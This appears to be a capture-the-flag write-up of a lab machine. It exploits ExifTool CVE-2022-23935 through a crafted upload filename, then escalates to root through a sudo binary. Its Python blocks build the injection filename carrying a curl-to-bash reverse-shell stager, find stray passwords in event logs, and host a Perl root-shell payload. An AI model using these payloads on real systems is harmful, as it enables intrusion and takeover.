Investigation

Enumeration

The Nmap scan shows two open ports: 22 (SSH) and 80 (HTTP).

The page didn't load when I browsed to the IP directly; it redirected to eforenzics.htb, so to view it I added the IP address and hostname to my /etc/hosts file.

The index page links to a "free image forensics service", so I played around with the upload feature. Once you upload a valid image, the service runs exiftool on it and returns the image metadata as a .txt file.

The generated metadata includes the ExifTool version number. Looking it up, that version is affected by CVE-2022-23935 (https://gist.github.com/ert-plus/1414276e4cb5d56dd431c2f0429e4429):


"Exiftool versions < 12.38 are vulnerable to Command Injection through a crafted filename. If the filename passed to exiftool ends with a pipe character | and exists on the filesystem, then the file will be treated as a pipe and executed as an OS command."

So to exploit this we need to upload a file whose name ends with the pipe character (|). ExifTool hands the name to Perl's two-argument open(), which treats a trailing "|" as "run this as a command", so whatever comes before the pipe is executed by the shell.

I created a reverse shell script, shell.sh, and had the filename fetch it with curl. Since "/" is not allowed in a filename, I base64-encoded the curl command and used pipes inside the filename to decode and run it once it reached the target.
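To make the mechanics concrete, here is an added example of building such a filename in Python. It is mine, not the write-up's, and it assumes a hypothetical attacker address of 10.10.14.5 and that the target has coreutils base64 and tr. One thing the write-up doesn't mention: standard base64 output can itself contain "/", which would make the name unusable as a filename; the fallback here to URL-safe base64, undone with tr on the target, is my own addition to handle that case.

```python
import base64

NAME_MAX = 255  # NAME_MAX on ext4 and most Linux filesystems

PIPE_SUFFIX = " | base64 -d | bash |"
# Runs on the target: map "_" (\137) back to "/" (\057) and "-" (\055) back to "+" (\053),
# i.e. turn URL-safe base64 into the standard alphabet that coreutils base64 -d expects.
# Octal escapes keep the literal "/" out of the filename itself.
TR_FIX = r"tr '\137\055' '\057\053'"


def build_pipe_filename(command: str) -> str:
    """Return a filename that ExifTool < 12.38 will execute as a shell pipeline.

    The name is handed to Perl's two-argument open(); because it ends in "|"
    Perl runs it as a command instead of reading it as a file.  "/" is not
    legal inside a filename, so the command travels base64-encoded and is
    decoded on the target.  If the base64 text itself contains "/", the
    URL-safe alphabet is used instead and undone with tr on the target.
    """
    std = base64.b64encode(command.encode()).decode()
    if "/" in std:
        stage = f"echo {base64.urlsafe_b64encode(command.encode()).decode()} | {TR_FIX}"
    else:
        stage = f"echo {std}"
    name = stage + PIPE_SUFFIX
    if "/" in name or "\0" in name:
        raise ValueError("filename contains a character the filesystem rejects")
    if len(name.encode()) > NAME_MAX:
        raise ValueError("payload too long for one filename; fetch a longer script instead")
    return name


def command_from_filename(name: str) -> str:
    """Decode a name produced by build_pipe_filename(); sanity check before uploading."""
    if not (name.startswith("echo ") and name.endswith(PIPE_SUFFIX)):
        raise ValueError("not a filename produced by build_pipe_filename()")
    body = name[len("echo "):-len(PIPE_SUFFIX)]
    blob, sep, _ = body.partition(" | ")
    decode = base64.urlsafe_b64decode if sep else base64.b64decode
    return decode(blob).decode()


def is_pipe_filename(name: str) -> bool:
    """Would Perl's two-argument open() treat this name as a pipe?

    open() strips surrounding whitespace, so "id | " is still a pipe.  This is
    the check an upload handler must make before passing a user-supplied name
    to a vulnerable exiftool.
    """
    return name.strip().endswith("|")


if __name__ == "__main__":
    # 10.10.14.5 is a hypothetical attacker address; shell.sh is the stager from the write-up
    name = build_pipe_filename("curl http://10.10.14.5/shell.sh | bash")
    print(name)
    assert command_from_filename(name) == "curl http://10.10.14.5/shell.sh | bash"
```

Upload an otherwise valid image under the returned name (for example by editing the multipart filename in Burp); when exiftool opens it, Perl runs the pipeline and the stager is fetched and executed. is_pipe_filename() is the check the upload handler should have made before handing a user-controlled name to exiftool, the other fix being to upgrade to ExifTool 12.38 or later.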

Once the image was uploaded, I got a reverse shell as www-data.

With a shell, /etc/passwd shows only two real users: root and smorton.

User

After trying the usual quick wins with no headway, I checked for scheduled tasks in cron, and there was indeed a job pointing at a folder called investigation in /usr/local.

I navigated to the directory and found a .msg file, which is an Outlook mail message. I copied it to my machine with nc for further exploration.

Since I didn't have a handy tool on Linux to render the .msg file, I used an online tool, https://msgeml.com/

The mail also has a compressed attachment containing an .evtx file, a Windows event log. It isn't human-readable as-is, but the Linux tool evtxexport (from libevtx) can dump it as XML.

After extensively digging through the ~700,000-line XML dump I found the password for user smorton.
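Reading 700,000 lines by hand is the slow way. As an added example (mine, not the write-up's), here is a Python triage script for an evtxexport XML dump: it tallies event IDs and lists TargetUserName values from logon-related events that occur only once. That heuristic is generic, not a claim about where this particular password lived: real accounts log on repeatedly, while a password mistyped into the user-name field shows up once, as a failed logon for a "user" that doesn't exist. The records are assumed to be in the standard Windows event XML schema that evtxexport -f xml emits; the sample log is constructed, not data from the box.

```python
import re
import sys
import xml.etree.ElementTree as ET
from collections import Counter

# Each record evtxexport prints is a standard Windows <Event> document; anything
# around the records (headers, blank lines) is ignored by matching just the element.
EVENT_RE = re.compile(r"<Event\b.*?</Event>", re.DOTALL)
LOGON_EVENTS = {"4624", "4625", "4648", "4776"}  # logon success, failure, explicit creds, NTLM auth


def iter_events(text):
    """Yield (event_id, {Data Name: value}) for every <Event> in the dump."""
    for m in EVENT_RE.finditer(text):
        try:
            ev = ET.fromstring(m.group(0))
        except ET.ParseError:
            continue  # a truncated record should not abort a 700k-line triage
        eid = (ev.findtext("./{*}System/{*}EventID") or "").strip()
        data = {d.get("Name", ""): (d.text or "").strip()
                for d in ev.iterfind("./{*}EventData/{*}Data")}
        yield eid, data


def event_id_counts(text):
    """How many records of each event id: shows what the log actually contains."""
    return Counter(eid for eid, _ in iter_events(text))


def logon_names(text):
    """Counter of (event_id, TargetUserName) over logon-related events."""
    names = Counter()
    for eid, data in iter_events(text):
        if eid in LOGON_EVENTS and data.get("TargetUserName"):
            names[(eid, data["TargetUserName"])] += 1
    return names


def rare_names(names, max_seen=1):
    """User names seen at most max_seen times across all logon events.

    Real accounts log on again and again; a password typed into the user-name
    field shows up once, as a failed logon for a 'user' that does not exist.
    """
    totals = Counter()
    for (_, name), n in names.items():
        totals[name] += n
    return sorted(name for name, n in totals.items() if n <= max_seen)


# Constructed sample in the shape evtxexport -f xml emits (not data from the box).
SAMPLE = """\
Event number: 1
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4624</EventID><Computer>WS01</Computer></System><EventData><Data Name="TargetUserName">alice</Data><Data Name="LogonType">2</Data></EventData></Event>
Event number: 2
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>4625</EventID></System><EventData><Data Name="TargetUserName">alice</Data><Data Name="Status">0xc000006d</Data></EventData></Event>
Event number: 3
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>4625</EventID></System><EventData><Data Name="TargetUserName">Summ3r2024!</Data><Data Name="Status">0xc000006d</Data></EventData></Event>
Event number: 4
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>4624</EventID></System><EventData><Data Name="TargetUserName">alice</Data></EventData></Event>
"""

if __name__ == "__main__":
    # usage: python3 triage.py events.xml   (falls back to the constructed sample)
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE
    for eid, n in event_id_counts(text).most_common(10):
        print(f"{eid:>6} {n}")
    print("rare logon names:", rare_names(logon_names(text)))
```

The event-ID tally is worth printing first: it tells you whether the log is a Security log full of logon events at all, and what the bulk of those 700,000 lines consists of, before you start grepping for anything specific.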

With that password I got SSH access as smorton, and with it the user flag.

Privilege Escalation

I uploaded linpeas.sh but it turned up nothing useful for privesc. sudo -l showed a file, /usr/bin/binary, that I can run as root. Running it by itself just prints "Exiting", so it's hard to tell what it does.

To take a closer look, I copied the binary to my machine and ran it through dogbolt, an online decompiler.

From the decompiled code, I noticed:

  • It checks that it was given command-line arguments, otherwise it exits

  • It checks that it is running as uid 0 (i.e. under sudo), otherwise it exits

  • It checks that its second argument equals the hard-coded string "", otherwise it exits

  • It uses curl to fetch a URL passed on the command line and saves the response to a file

  • It runs perl on that file

That makes the exploit straightforward: the binary fetches a file I control and runs it with perl as root, so the GTFOBins perl shell (a script that just execs a shell) should hand me a root shell.
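As an added example (mine, not the write-up's), here is the attacker side of that chain in Python: write the Perl payload, host it over HTTP, and print the command to run on the target. It assumes a hypothetical attacker address of 10.10.14.5, assumes the URL is the binary's first argument and the hard-coded string its second (the write-up doesn't state the order), and uses a placeholder for that string, whose value did not survive in the write-up.

```python
import http.server
import os
import socketserver
import sys
import tempfile
import threading

# Same idea as the GTFOBins "perl" shell entry (perl -e 'exec "/bin/sh";'), but as a
# file, because the binary fetches a file with curl and then runs perl on it.  perl is
# already running as root at that point, so the exec'd bash simply inherits uid 0.
ROOT_SHELL_PL = 'exec "/bin/bash", "-i";\n'


class _Server(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True


def write_payload(directory, name="shell.pl"):
    """Write the Perl payload into directory and return its path."""
    path = os.path.join(directory, name)
    with open(path, "w") as fh:
        fh.write(ROOT_SHELL_PL)
    return path


def serve(directory, port=8000):
    """Serve directory over HTTP from a background thread (what python3 -m http.server does)."""
    def handler(*args, **kwargs):
        return http.server.SimpleHTTPRequestHandler(*args, directory=directory, **kwargs)
    srv = _Server(("0.0.0.0", port), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def target_command(attacker_host, secret_arg, name="shell.pl", port=8000):
    """The sudo invocation to run on the target as smorton.

    Assumptions of this example: the URL is the first argument and the hard-coded
    string the binary compares against is the second; secret_arg is a placeholder
    for that string, which the write-up does not reproduce.
    """
    return f"sudo /usr/bin/binary http://{attacker_host}:{port}/{name} {secret_arg}"


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "10.10.14.5"  # hypothetical attacker address
    secret = sys.argv[2] if len(sys.argv) > 2 else "<string-from-decompiler>"
    with tempfile.TemporaryDirectory() as www:
        write_payload(www)
        srv = serve(www)
        print("on the target run:", target_command(host, secret))
        print("serving payload; Ctrl-C to stop")
        try:
            threading.Event().wait()
        except KeyboardInterrupt:
            srv.shutdown()
```

exec rather than system is deliberate: the Perl process is replaced by bash, so there is no perl parent left to exit and take the shell with it when the binary's curl-then-perl sequence finishes.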


And just like that, I escalated my privileges to root.